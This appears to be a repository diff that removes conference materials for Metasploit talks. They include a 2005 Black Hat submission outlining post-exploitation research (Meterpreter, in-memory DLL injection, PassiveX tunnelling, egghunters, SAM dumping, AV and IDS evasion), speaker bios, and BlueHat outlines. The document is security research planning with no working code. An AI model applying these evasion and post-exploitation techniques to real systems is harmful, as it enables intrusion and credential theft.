v. Loading and interacting with shared object files
e. Registry
i. General registry API access
ii. Opening, creating, and removing registry keys
iii. Setting, querying, and deleting registry values
iv. Enumeration of both keys and values
f. User interface
i. Disabling local user interaction via the keyboard
and/or mouse (similar to VNC)
ii. Idle timeout checking to see how long it's been
since the user did something interactive
6. The ``priv'' extension
a. Still in development
b. Exposes an interface to escalating local privileges
through local vulnerabilities
c. SAM dumping support similar to pwdump3
D. dN
1. Simple low-footprint post-exploitation tool
2. Useful to scope out execution enviroment, then bootstrap other tools
IV. Payload Research
A. PassiveX
1. Overview
a. Post-exploitation payload
b. A derivative of On-Disk library injection that uses
ActiveX controls
c. Supports arbitrary DLL injection in any language that can
be compiled as an ActiveX control (C++, VB, etc)
d. Detailed analysis can be found in included resources
(include passivex paper)
2. Payload Implementation
a. Disables iexplore Internet zone restrictions on
ActiveX controls
i. Modifies four registry values that are stored per-user
b. Launches a hidden iexplore at a URL with an embedded
OCX
i. The OCX does not have to be signed
ii. No user interaction is required
iii. OCX is automatically downloaded, registered, and loaded
into the browser's context
3. Sample HTTP tunneling ActiveX control
a. HTTP GET/POST used to build tunnel to attacker
i. Uses the WININET API
ii. Outbound traffic from target machine encapsulated in POST
request
iii. Inbound traffic from attacker encapsulated in GET response
iv. Proxy configuration automatically inherited
v. Requires HTTP server capable of performing encap/decap on the
HTTP packets
b. Streaming connection through HTTP tunnel can be created
i. socketpair doesn't exist natively on win32 but can be simulated
with a local listener
ii. Streaming abstraction allows advanced payloads to transparently
use the HTTP transport (Meterpreter, VNC)
iii. Local listener less covert, but highly beneficial
4. Pros
a. Bypasses restrictive outbound filters
b. Re-uses proxy configuration
c. Looks like normal user traffic
d. Allows full access to the win32 API like all forms of
library injection
5. Cons
a. Touches the disk
b. Requires administrative access
i. Internet Explorer prohibits the downloading of
ActiveX controls as non-admin
B. Windows Ordinal Stagers
1. Overview
a. Technique from Oded's lightning talk from core04
b. Uses static ordinals to locate winsock symbol addresses
c. Compatible with all versions of Windows
d. 92 byte reverse stager, 93 byte findsock stager
e. Detailed explanation can be found in included resources
(include spoonm ordinal paper)
2. Reverse Ordinal Stager
a. Walks InitOrderModuleList searching for ws2_32
b. Uses static ordinals to index the export table
c. Creates fd with socket
d. Chains connect and recv frames
e. Returns into buffer read in from file descriptor
C. Egghunting
1. Overview
a. Small stub payload that can search for a larger payload
b. Useful for exploits that have limited payload space but can
stash more payload elsewhere in memory
c. Example exploits include the IE object type vulnerability.
d. Goal is to safely search target address space for the larger
payload.
e. Larger payload is located by searching for an egg that is prepended
to it.
f. Detailed analysis can be found in included resources
(include egghunt paper)
2. Two primary methods of egghunting on Windows
a. SEH
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
versions of Windows (including 9x)
2. Installs a custom exception handler
3. Begins walking the address space
i. When a bad address is encounter, the current pointer is
incremented by PAGE_SIZE
ii. When a mismatch of the egg is encountered, the current pointer
is incremented by one
4. Each address is compared against the 8-byte egg
i. Bad addresses will throw exceptions which will be handled
by the custom exception handler
5. When the egg is found, jump past the egg into the larger payload
b. System call
1. Very small stub (32 bytes), searches for an 8 byte egg, only
compatible with NT+
2. Uses a non-intrusive system call (NtDisplayString) to search validate
addresses
i. Same page walking logic as SEH is used
3. When the egg is found, jump past the egg into the larger payload
3. One primary method of egghunting on Linux
a. System call
1. 30 bytes in size, searches for an 8 byte egg
2. System call technique applies to other UNIX variants as well
3. Uses the sigaction system call to validate 16 bytes at once
4. Pros
i. Very small
5. Cons
i. Corner cases may cause it to be unstable
V. The Complete Picture - Metasploit 3.0
A. The power of pre-exploitation prepartion
1. Abstract NOP generation
2. Abstract payload encoding
3. Abstract exploit connection handlers
i. Bind handler
ii. Reverse handler
iii. Findsock handler
B. The power of exploit generalization
1. Standardized exploit creation interface
i. Robust target definitions
ii. Detailed exploit implementation information
iii. Entirely payload independent, no hardcoding paylaods
C. The power of post-exploitation automation
1. Complicated tasks made simple with scripting
i. Want to download a targets entire harddrive?
ii. Want to disable local user interaction?
iii. Want to upload and play an mp3 on the target?
iv. Want to 'be' on the target's network?
2. Standard interface means cross platform support
VI. Conclusion - where do we go from here?
A. Future Post-exploitation research
1. Mesh network support
2. Expansion of the stdapi described in this document
included resources:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
http://www.hick.org/code/skape/papers/meterpreter.pdf
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
http://www.metasploit.com/users/spoonm/ordinals.txt
cited material:
STRIDE:
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
syscall proxy:
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf

7
dev/materials/blackhat05/skape_bio.txt
View File

@ -1,7 +0,0 @@
Skape is a lead software developer by day and an independent security researcher
by night. He joined forces with the Metasploit project in 2004 where his many
contributions have included the Meterpreter, VNC injection, and many other
payload advances. Skape has worked on a number of open-source projects and has
authored several papers on security related technologies. His current security
related intrerests include post-exploitation technologies, payload development
and optimization, and exploitation prevention technology.

673
dev/materials/blackhat05/submission_form.txt
View File

@ -1,673 +0,0 @@
Date of Submission:
04/2005
I would like to present this at:
USA 2005
Personal Information
Primary Speaker Name:
spoonm
Primary Speaker Title (if applicable):
Additional Speaker Name(s), Title(s) and Company(s) (if applicable):
skape
Speaking on Behalf of:
Primary Contact's Email:
spoonm@gmail.com
Primary Contact's Telephone:
Speaker's Email (if different from the primary speaker's email):
Speaker's Telephone (if different from the primary speaker's telephone):
Has the speaker spoken at a previous Black Hat event? Yes or No
Yes
Does the speaker have any professional speaking experience? Yes or No
Yes
If yes, please list the three most recent engagements.
- cansecwest 2005
- defcon 2004
- blackhat 2004
Has or will this presentation be seen in any form? If so, explain how this
presentation is different from previous versions, and where/when this material
has been seen before.
No
Will or has the speaker(s) be presenting at ANY event 30 days prior to this
conference? If yes, please specify which event and on what topic(s).
No
Presentation Information
Name of Presentation:
- Beyond EIP
Select the track(s) that your talk would be most appropriate for your topic (you
must select at least one of the nine):
- Deep Knowledge
- 0 Day Attack
How much time does your presentation require? 75 minutes, 90 minutes or 20
minutes (turbo track) (please specify)
90 minutes (could do 75 if necessary)
What are the three most important reasons why this is a quality Black Hat talk?
Reason 1:
Although we continue to publicly release much of our work, there is much
more involved under the hood than just what's released. Blackhat is the
perfect venue to discuss our ideas, research, design, and development in
detail. It's really important to be able to discuss the sort of things we've
thought very hard about and to present the conclusions that would otherwise
be taken for granted.
Reason 2:
The technology discussed in this presentation impacts a wide number of
security related fields including NIDS, HIPS, Anti-Virus, penetration
testing, and the exploit development cycle in general.
Reason 3:
Many of the audience members can't be fully engaged in the deep world of
security research. This is a chance for them to get a "view from the
trenches", and see what's actually happening on the attacker security front.
Audience members will get an idea of where technologies currently stand, how
they work, and what might be in store for the future.
Is there a demonstration? Yes or No
Yes
Are the speaker(s) releasing a new tool? Yes or No
Possibly, or will talk about many recent (within a year) releases.
Are the speaker(s) releasing a new exploit? Yes or No
No
Is there audience participation? Yes or No
No
What are your equipment needs?
1 projector.
Will you require more than 2 lcd projectors? Yes or No - if yes, please specify
how many
No
Will you require internet access? Yes or No
No
Will you require a white board? Yes or No
No
Will you require any special equipment? Yes or No - if yes, please specify.
No
Detailed Outline:
Note:
We've tried to include most of the topics that will be covered in our
presentation. However, many of these things will be discussed, but will not be
our main concentration. The majority of our presentation will be around topic
V. C, our new post-exploitation advances, and how they will be designed and
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
Blackhat, but more important than the software itself is the work we've done
on developing the individual components that it will be built from.
This outline is pretty indepth, so it's hard to pick out all the nuggets of
coolness. We've developed many really useful technologies in the area of
payload development. These are things we've created since last year's
Blackhat, including many advances in polymorphic shellcode, and
high-permutation attacks.
I. Introduction
A. Who are we?
1. spoonm
2. skape
B. Exploit Technology
1. Three Phases of Exploitation
a. Pre-exploitation
b. Exploitation
c. Post-exploitation
2. Pre-exploitation - Preparing the payload
a. NOP generation
b. Payload encoders
c. Connection handler initialization
3. Exploitation - Leveraging the vulnerability
a. Stack overflows
c. Heap overflows
b. SEH overwrites
d. Arbitrary pointer overwrites
4. Post-Exploitation - Manipulating the target
a. Command shell redirection
b. Arbitrary command execution
c. Pivoting payloads
d. Advanced payload interaction
B. Where do we stand?
1. Pre-exploitation
a. Robust and elegant encoders do exist
i. SkyLined's alpha-numeric encoder
ii. Spoonm's Shikata Ga Nai
b. Payload encoders generally taken for granted
i. Most encoders are static with a variable key
ii. IDS able to signature static decoder stubs
c. NOP generation hasn't publically changed much
i. PoC exploits generally use predictable nops, if any
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
iii. Not considered very important to many researchers
d. NIDS deployments are playing chase the tail
i. The mouse always has the advantage; NIDS is reactive
ii. Advanced nops and encoders push NIDS to its limits
2. Exploitation
a. Techniques have become very mature
i. Linux/BSD exploitation techniques largely unchanged
ii. Win32 heap overflows now more reliable (oded/shok)
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
b. Exploitation topics have been beaten to death
3. Post-exploitation
a. Common payloads are limited
i. Command shell interaction has poor automation support
ii. Limited to the command set that the interpreter provides
iii. Bounded by the utilities installed on the target machine
iv. Restrictive environments (chroot) can hinder command execution
v. HIPS vendors becoming more adept at detecting basic payloads
- LoadLibraryA from the stack, etc (mcafee 8.0i)
b. Communication vectors largely unchanged
i. Reverse and port-bind payloads still the most common
ii. Findsock style payloads still unused by PoC exploits
iii. Alternative communication vectors rarely discussed
c. Pivoting technology exists
i. Core ST described system call proxying in 2002
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
C. What will we discuss?
1. Pre-exploitation Research
a. NOP generation
i. Opty2
b. Encoders
i. Additive feedback encoders
ii. Shikata Ga Nai
2. Post-Exploitation Research
a. Library Injection
i. Facilitates things like Meterpreter and VNC injection
b. VNC Injection
i. Introduced at blackhat04 with the Metasploit 2.2 release
c. Meterpreter & dN
i. The cross-platform post-exploitation suite
3. Payload Research
a. PassiveX
i. Taking advantage of ActiveX controls
b. Ordinal Stagers
i. Tiny network capable stagers
c. Egghunt (maybe?)
i. Small payload capable of locating a larger payload
ii. Useful for exploits with limited space
II. Pre-exploitation
A. OptyNop2
1. Creation and benefits of multi-byte nopsleds
B. Additive feedback encoders
C. Shikata Ga Nai
1. High permutation shellcode through simple dependency mappings
III. Post-exploitation
A. Library Injection
1. Overview
a. Paper published in 04/2004
b. Provides advanced code execution
c. Code can be written in any language that can compile down
to a shared object.
d. Allows developer to use all of the APIs exposed to a normal
application.
e. Detailed explanation can be found in included resources
(include lib inject paper)
2. Two types of library injection
a. On-Disk
i. Library is loaded from the target's harddrive or via a
file share.
ii. Can be detected by AV products due to fs access
b. In-Memory
i. Library is uploaded to the target and loaded from memory
without touching the disk
ii. Evades file system filter drivers, such as those
provided by AV companies
iii. Not touching the disk means no forensic trace
iv. VirtualLock prevents swapping to disk, but requires admin
3. In-memory library injection on Windows
a. System calls used by the library loader are hooked
i. NtCreateFile
ii. NtMapViewOfSection
iii. etc
b. Unique image name is used to identify the image to image that
is in memory
c. System call hooks are removed so that future injectino can
occur
d. Alternative approaches
i. Could do client-side relocations, but would need to handle
import processing
4. In-memory library injection on Linux/BSD
a. No known public implementations
b. Requires alternate approach
i. Hooking API routines not always possible -- symtab not
mapped into memory
ii. libc symbol version mismatches lead to linking nightmares
c. Client-side relocations seem most feasible
i. Remote side maps a region of memory and sends the client
the base address
ii. Client processes relocations and transmits the relocated
image as its mapped segment would appear
iii. Requires locating rtld base so that PLT lookups will
work
B. VNC Injection
1. Implements VNC as an injectable DLL
a. Uses RealVNC as the code-base
b. VNC communication uses the exploit connection
c. No physical trace is left of the VNC server
d. Can operate regardless of existing VNC installations
2. Easy way to illustrate insecurities
a. Suits understand mouse movement better than black box command
prompts
C. Meterpreter
1. Generic post-exploitation suite
a. Based on library injection
b. Uses the established exploit connection
i. Especially powerful with findsock payloads; no new connection
c. Executes entirely from memory
d. No new processes or file access required for the payload to
succeed
e. Detailed explanation can be found in included resources
(include meterpreter paper)
2. Extension system provides advanced automation support
a. No need to hand write tedious assembly
b. Existing native code can be ported to a meterpreter extension
3. Architecture
a. Design goals
i. Very flexible protocol; should adapt to extension requirements
ii. Exposure of a channelized communication system to extensions
iii. Stealth operation
iv. Should be portable to various operating systems
v. Client from one platform should work with server on another
platform
b. Protocol
i. Uses TLVs (Type-Length-Value) to support arbitrary data
passing.
ii. TLVs allow the packet parser to be oblivious to the structure
of the value field
iii. Type field is broken down into meta types
4. Core interface
a. Overview
i. Minimal interface to support the loading of extensions
ii. Implements the basic packet transmission and dispatching
facilities
iii. Exposes channel allocation and management to extensions
b. Advanced features
i. Migrating the server instance between processes
5. The ``stdapi'' extension
a. Overview
i. Included in Metasploit 3.0
ii. Provides access to some of the common subsystems of the
target operating system
iii. Allows for easy automation and implementation of robust
post-exploitation scripts
b. File System
i. File and directory interaction
ii. Files can be uploaded and downloaded between the
attacker and the target
c. Network
i. Transparent network pivoting
ii. Route table enumeration and manipulation
iii. Local interface enumeration
d. Process
i. Process execution, optionally with channelized IO
ii. Enumeration of running processes
iii. Modification of arbitrary memory
iv. Creation and modification of running threads
v. Loading and interacting with shared object files
e. Registry
i. General registry API access
ii. Opening, creating, and removing registry keys
iii. Setting, querying, and deleting registry values
iv. Enumeration of both keys and values
f. User interface
i. Disabling local user interaction via the keyboard
and/or mouse (similar to VNC)
ii. Idle timeout checking to see how long it's been
since the user did something interactive
6. The ``priv'' extension
a. Still in development
b. Exposes an interface to escalating local privileges
through local vulnerabilities
c. SAM dumping support similar to pwdump3
D. dN
1. Simple low-footprint post-exploitation tool
2. Useful to scope out execution enviroment, then bootstrap other tools
IV. Payload Research
A. PassiveX
1. Overview
a. Post-exploitation payload
b. A derivative of On-Disk library injection that uses
ActiveX controls
c. Supports arbitrary DLL injection in any language that can
be compiled as an ActiveX control (C++, VB, etc)
d. Detailed analysis can be found in included resources
(include passivex paper)
2. Payload Implementation
a. Disables iexplore Internet zone restrictions on
ActiveX controls
i. Modifies four registry values that are stored per-user
b. Launches a hidden iexplore at a URL with an embedded
OCX
i. The OCX does not have to be signed
ii. No user interaction is required
iii. OCX is automatically downloaded, registered, and loaded
into the browser's context
3. Sample HTTP tunneling ActiveX control
a. HTTP GET/POST used to build tunnel to attacker
i. Uses the WININET API
ii. Outbound traffic from target machine encapsulated in POST
request
iii. Inbound traffic from attacker encapsulated in GET response
iv. Proxy configuration automatically inherited
v. Requires HTTP server capable of performing encap/decap on the
HTTP packets
b. Streaming connection through HTTP tunnel can be created
i. socketpair doesn't exist natively on win32 but can be simulated
with a local listener
ii. Streaming abstraction allows advanced payloads to transparently
use the HTTP transport (Meterpreter, VNC)
iii. Local listener less covert, but highly beneficial
4. Pros
a. Bypasses restrictive outbound filters
b. Re-uses proxy configuration
c. Looks like normal user traffic
d. Allows full access to the win32 API like all forms of
library injection
5. Cons
a. Touches the disk
b. Requires administrative access
i. Internet Explorer prohibits the downloading of
ActiveX controls as non-admin
B. Windows Ordinal Stagers
1. Overview
a. Technique from Oded's lightning talk from core04
b. Uses static ordinals to locate winsock symbol addresses
c. Compatible with all versions of Windows
d. 92 byte reverse stager, 93 byte findsock stager
e. Detailed explanation can be found in included resources
(include spoonm ordinal paper)
2. Reverse Ordinal Stager
a. Walks InitOrderModuleList searching for ws2_32
b. Uses static ordinals to index the export table
c. Creates fd with socket
d. Chains connect and recv frames
e. Returns into buffer read in from file descriptor
C. Egghunting
1. Overview
a. Small stub payload that can search for a larger payload
b. Useful for exploits that have limited payload space but can
stash more payload elsewhere in memory
c. Example exploits include the IE object type vulnerability.
d. Goal is to safely search target address space for the larger
payload.
e. Larger payload is located by searching for an egg that is prepended
to it.
f. Detailed analysis can be found in included resources
(include egghunt paper)
2. Two primary methods of egghunting on Windows
a. SEH
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
versions of Windows (including 9x)
2. Installs a custom exception handler
3. Begins walking the address space
i. When a bad address is encounter, the current pointer is
incremented by PAGE_SIZE
ii. When a mismatch of the egg is encountered, the current pointer
is incremented by one
4. Each address is compared against the 8-byte egg
i. Bad addresses will throw exceptions which will be handled
by the custom exception handler
5. When the egg is found, jump past the egg into the larger payload
b. System call
1. Very small stub (32 bytes), searches for an 8 byte egg, only
compatible with NT+
2. Uses a non-intrusive system call (NtDisplayString) to search validate
addresses
i. Same page walking logic as SEH is used
3. When the egg is found, jump past the egg into the larger payload
3. One primary method of egghunting on Linux
a. System call
1. 30 bytes in size, searches for an 8 byte egg
2. System call technique applies to other UNIX variants as well
3. Uses the sigaction system call to validate 16 bytes at once
4. Pros
i. Very small
5. Cons
i. Corner cases may cause it to be unstable
V. The Complete Picture - Metasploit 3.0
A. The power of pre-exploitation prepartion
1. Abstract NOP generation
2. Abstract payload encoding
3. Abstract exploit connection handlers
i. Bind handler
ii. Reverse handler
iii. Findsock handler
B. The power of exploit generalization
1. Standardized exploit creation interface
i. Robust target definitions
ii. Detailed exploit implementation information
iii. Entirely payload independent, no hardcoding paylaods
C. The power of post-exploitation automation
1. Complicated tasks made simple with scripting
i. Want to download a targets entire harddrive?
ii. Want to disable local user interaction?
iii. Want to upload and play an mp3 on the target?
iv. Want to 'be' on the target's network?
2. Standard interface means cross platform support
VI. Conclusion - where do we go from here?
A. Future Post-exploitation research
1. Mesh network support
2. Expansion of the stdapi described in this document
included resources:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
http://www.hick.org/code/skape/papers/meterpreter.pdf
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
http://www.metasploit.com/users/spoonm/ordinals.txt
cited material:
STRIDE:
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
syscall proxy:
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
Abstract:
When we built Metasploit, our focus was on the exploit development process. We
tried to design a system that helped create reliable and robust exploits. While
this is obviously very important, it's only the first step in the process. What
do you do once you own EIP? Our presentation will concentrate on the recent
advancements in shellcode, IDS/firewall evasion, and post-exploitation systems.
We will discuss the design and implementation of the technologies that enable
complex payloads, such as VNC injection, and the suite of tools we've built upon
them. We will then present a glimpse of the next generation of Metasploit, and
how these new advances will serve as its backbone.
Blog Entry:
Blog entry, Stardate April, 2005
We have recently been on a new shellcode kick, but this time it's not about
making them smaller. We're currently working on building very powerful new
post-exploitation shellcode and toolkits, and a very powerful unified API to
expose their functionality. This will allow us to diverge from precanned
payloads, which will in turn allow users to quickly build powerful and portable
post-exploitation tools. We have built strongly upon our Windows DLL
injection, and are working on extending similar functionality to the land of
Unix. We're also working hard on the next version of Metasploit, which follows
this same philosophy of embedability and extensablity, allowing users to build
their own tools on top of our framework. Our previous work was all about exploit
frameworks. In our new approach we are really building more of a hacker tool
framework, allowing very strong automation and customization.
Supporting File(s):
Additional files/materials? No
Speaker's Bio(s):
Spoonm:
Since late 2003, spoonm has been one of the core developers behind the
Metasploit Project. He is responsible for much of the architecture in version
2.0, as well as other components including encoders, nop generators, and a
polymorphic shellcode engine. A full-time student at a northern university,
spoonm spends too much of his free time on security research projects.
Skape:
Skape is a lead software developer by day and an independent security researcher
by night. He joined forces with the Metasploit project in 2004 where his many
contributions have included the Meterpreter, VNC injection, and many other
payload advances. Skape has worked on a number of open-source projects and has
authored several papers on security related technologies. His current security
related interests include post-exploitation technologies, payload development
and optimization, and exploitation prevention technology.
Transfer of Copyright
I warrant that the above work has not been previously published elsewhere, or if
it has, that I have obtained permission for its publication by Black Hat, Inc.
and that I will promptly supply Black Hat, Inc. with wording for crediting the
original publication and copyright owner.
If I am selected for presentation, I hereby give Black Hat, Inc. permission to
duplicate, record and redistribute this presentation; including, but not limited
to, the conference proceedings, conference CD, video, audio, hand outs(s) to the
conference attendees for educational, on-line and all other purposes.
Yes, I, (insert primary speaker name), have read the above and agree to the
Transfer of Copyright.
Agreement to Terms of Speaking Requirements
If I am selected to speak, I understand that I must complete and fulfill the
following requirements or I will forfeit my honorarium:
1) I will submit a completed presentation in Powerpoint format for publication
in the printed conference proceedings by the date specified in the CFP Letter of
Acceptance.
2) I understand if I fail to submit a completed presentation by the date
specified in the CFP Letter of Acceptance, I may be replaced by an alternate
presentation or, if allowed to present, will forfeit $250 of my honorarium.
3) I will submit a completed (and possibly updated) presentation, a copy of the
tool(s) and/or code(s), and a reference to all of the tool(s), law(s), Web sites
and/or publications referenced to at the end of my talk and as described in this
CFP submission for publication on the conference CD by the date specified in the
CFP Letter of Acceptance.
4) I will include a detailed bibliography as either a separate document or
included within the presentation of all resources cited and/or used in my
presentation.
5) I will be on hand and accessible to delegates during Black Hat social events
including, but not limited to, luncheons and receptions.
6) I will complete my presentation in the time allocated to me - not ending 15
minutes before or running 5 minutes over the time allocation.
7) I understand that Black Hat will provide 2 lcd projectors, 2 screens,
microphone, and video switch box. I understand that I am responsible for
providing all other necessary equipment, including laptops and machines, to
complete my presentation.
8) I will submit, within 5 days of the completion of the conference, any
updated, revised or additional presentation(s) or materials that were used in my
presentation but not included on the conference CD or conference proceedings.
I, spoonm, have read the above and understand and agree
to the terms as detailed in the Agreement to Terms of Speaking Requirements.
Agreement to Terms of Speaking Remuneration
1) I understand that Black Hat will only pay for one roundtrip coach class
airfare per presentation.
2) I understand that if I choose to arrange the airfare myself, I must first
receive approval from the Conference Administrator or I will not be reimbursed
for the airfare. I understand that if I wish to be reimbursed for airfare, I
must supply a valid receipt in the form of a travel agency issued air itinerary
and/or ticket receipt with the airfare printed on it. I understand that there is
a $750 cap for airfare and I will be reimbursed for up to that amount.
3) I understand that if I choose to travel by automobile I will receive $0.32
per mile, roundtrip, as reimbursement. If I travel by rail or bus I will be
reimbursed for the cost of the ticket price.
4) I understand that Black Hat will pay for one hotel room for three nights at
the official venue hotel.
5) I understand that I will be required to provide the hotel with a valid credit
card on check in to secure the room and any and all additional costs incurred by
me (including but not limited to room service, phone line usage, room internet
access, movies, etc) WILL NOT be reimbursed by Black Hat.
6) I understand that the person listed as the primary speaker will be required
to complete a W9 form (only if a US citizen) in order to be paid. Non-US
citizens will be paid via wire transfer (or you may choose to be paid with a
company check).
7) I understand that Black Hat will issue one payment per presentation and the
check will be issued to the person listed as the primary speaker. Payment will
be made net 30 from the end of the conference.
8) I understand that the name and address on the W9 or wire transfer is where
the payment will be sent.
9) I understand that if I am employed by an official Black Hat sponsor, that I
will not receive any compensation for travel, hotel accommodations or an
honorarium from Black Hat, Inc.
10) I understand that should my talk be determined to be a vendor or sales pitch
that I will not receive any reimbursement for travel, hotel accommodations or an
honorarium.
11) I understand that should my talk be selected for the "Turbo Talks" I will
ONLY receive entrance to the Briefings. As a "Turbo Talks" presenter, I WILL NOT
receive a speaking honorarium or compensation for hotel or travel.
Yes, I, spoonm, have read the above and understand and
agree to the terms as detailed in the Agreement to Terms of Speaking
Remuneration or I will forfeit my honorarium.

81
dev/materials/bluehat01/06v1/asp_outline.txt
View File

@ -1,81 +0,0 @@
Title:
Bitten on the ASP
(How NOT to deploy ASP.NET applications)
Intro:
Who
BreakingPoint
Metasploit
What
ASP.Net deployment issues
Default configuration
Common configuration flaws
Platform problems
Why
Widely deployed
Poorly researched
Lack of tools
Basics
Global default configuration file
Code separated into Applications
Applications override configuration file
Structure
Sample web application structure
Visual studio files
Deploy vs Copy
IIS Integration
Extension vs ASP.Net mappings
What files have no mapping?
Cryptography
MAC Key
Encryption Key
ViewState / Session Generation
Sessions
CookieLess
InProcess
StateServer
Possible flaws
SQL Database
Field lengths, character data
Sliding Sessions...
Florida example
Error Handling
Default settings
aspxerrorpath tricks
Information disclosure
Forms Authentication
?
ViewState Information
Data leak, MAC, etc.
Debugging
Debugging left enabled
Tracing left enabled!
Overview
Locking down ASP.Net is not hard
Thousands of sites arent doing it
Microsoft Terra ServerDopostback/rss.aspx
Microsoft Research
Summary
Vulns
Tools
Fixes
Done
IssueTracker.mdb

75
dev/materials/bluehat01/06v1/msf_outline.txt
View File

@ -1,75 +0,0 @@
Title:
Metasploit^3
Intro:
Who
BreakingPoint
Metasploit
What
Exploit framework evolution
Why
Exploits are commodities
Integration is the tricky part
Who needs a shell when...
Merge of two distinct users
Network admins
Penetration testers
Exploit Frameworks
Development platform for exploit code
Shrink exploit development time
Enable security research
Automation
Metasploit
Started off with ~7 exploits
v1 - 2,000 lines of perl
v2 - 40,000 lines of perl, 3,000 asm, 7,000 C
v3 - 80,000 lines of perl, 4,000 asm, 12,000 C
Exploit launcher
Modular components
Consistent interface
Three UI's
Metasploit^3
Complete rewrite in the Ruby language
Code compression ~40%
Completely OO, no more dirty perl tricks
Focused on simplicity, consistency, extensibility
Architecture
Rex Library
MSF Library
MSF Core
MSF Interfaces
Libraries
Create your own MSF app in ~5 lines of code :-)
Simple to work with any module programatically
Write standalone security apps using our libs
Concepts
Interfaces
Load and interact with modules
Jobs
Modules running in the background
Sessions
Interactive shells and more
Modules
Payloads
Encoders
Nops
Exploits
Auxiliary
Plugins
Extend anything at runtime
Examples
Reconnaisance module
Passive exploit modules
Handling multiple sessions

77
dev/materials/cansecwest05/admtable.tex
View File

@ -1,77 +0,0 @@
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy102}{rgb}{0.4,0,0.6}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
\definecolor{Hexy103}{rgb}{0.403,0,0.596}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy137}{rgb}{0.537,0,0.462}
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy223}{rgb}{0.874,0,0.125}
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
\definecolor{Hexy130}{rgb}{0.509,0,0.490}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
\definecolor{Hexy105}{rgb}{0.411,0,0.588}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 52
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy110}6e \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy118}76
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy135}87 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy106}6a
\color{HexyGreen}40 \color{Hexy107}6b \color{Hexy114}72 \color{Hexy106}6a \color{Hexy104}68 \color{Hexy116}74 \color{Hexy102}66 \color{Hexy119}77 \color{Hexy111}6f \color{Hexy109}6d \color{Hexy116}74 \color{Hexy108}6c \color{Hexy119}77 \color{Hexy112}70 \color{Hexy116}74 \color{Hexy88}58 \color{Hexy114}72
\color{HexyGreen}50 \color{Hexy106}6a \color{Hexy103}67 \color{Hexy113}71 \color{Hexy112}70 \color{Hexy123}7b \color{Hexy116}74 \color{Hexy118}76 \color{Hexy124}7c \color{Hexy112}70 \color{Hexy124}7c \color{Hexy107}6b \color{Hexy120}78 \color{Hexy0}00 \color{Hexy110}6e \color{Hexy86}56 \color{Hexy100}64
